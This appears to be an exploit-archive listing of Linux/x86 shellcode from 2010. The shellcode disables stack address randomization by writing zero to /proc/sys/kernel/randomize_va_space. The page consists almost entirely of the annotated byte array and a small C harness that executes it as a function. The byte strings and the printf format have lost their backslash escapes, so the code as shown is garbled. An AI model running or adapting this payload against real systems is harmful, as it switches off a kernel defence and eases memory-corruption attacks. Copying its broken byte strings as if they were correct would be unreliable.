[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86 - Disable randomize stack addresse - 106 bytes
# Published : 2010-05-25
# Author : Jonathan Salwan
# Previous Title : Solaris/x86 - Remote Download file - 79 bytes
# Next Title : Solaris/x86 - Reboot() - 37 bytes
/*
Title: Linux/x86 - Disable randomize stack addresse - 106 bytes
(Set randomize_va_space to zero)
Author: Jonathan Salwan <submit (!) shell-storm.org>
Web: http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
!Database of Shellcodes http://www.shell-storm.org/shellcode/
Date: 2010-05-25
Tested: Linux 2.6.33 - i686
! You need root euid
*/
#include <stdio.h>
char sc[] = "x31xdb" // xor %ebx,%ebx
"x6ax61" // push $0x61
"x89xe3" // mov %esp,%ebx
"xb0x0a" // mov $0xa,%al
"xcdx80" // int $0x80
"x31xdb" // xor %ebx,%ebx
"x6ax65" // push $0x65
"x66x68x61x63" // pushw $0x6361
"x68x61x5fx73x70" // push $0x70735f61
"x68x7ax65x5fx76" // push $0x765f657a
"x68x64x6fx6dx69" // push $0x696d6f64
"x68x2fx72x61x6e" // push $0x6e61722f
"x68x72x6ex65x6c" // push $0x6c656e72
"x68x73x2fx6bx65" // push $0x656b2f73
"x68x63x2fx73x79" // push $0x79732f63
"x68x2fx70x72x6f" // push $0x6f72702f
"x89xe3" // mov %esp,%ebx
"x30xc0" // xor %al,%al
"xb0x11" // mov $0x11,%al
"x31xc9" // xor %ecx,%ecx
"x66xb9x41x04" // mov $0x441,%cx
"x31xd2" // xor %edx,%edx
"x66xbaxa4x01" // mov $0x1a4,%dx
"x31xc0" // xor %eax,%eax
"xb0x05" // mov $0x5,%al
"xcdx80" // int $0x80
"x89xc3" // mov %eax,%ebx
"x31xc9" // xor %ecx,%ecx
"x66x68x30x0a" // pushw $0xa30
"x89xe1" // mov %esp,%ecx
"x31xd2" // xor %edx,%edx
"xb2x02" // mov $0x2,%dl
"x31xc0" // xor %eax,%eax
"xb0x04" // mov $0x4,%al
"xcdx80" // int $0x80
"xb0x01" // mov $0x1,%al
"xcdx80"; // int $0x80
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(sc));
(*(void(*)()) sc)();
return 0;
}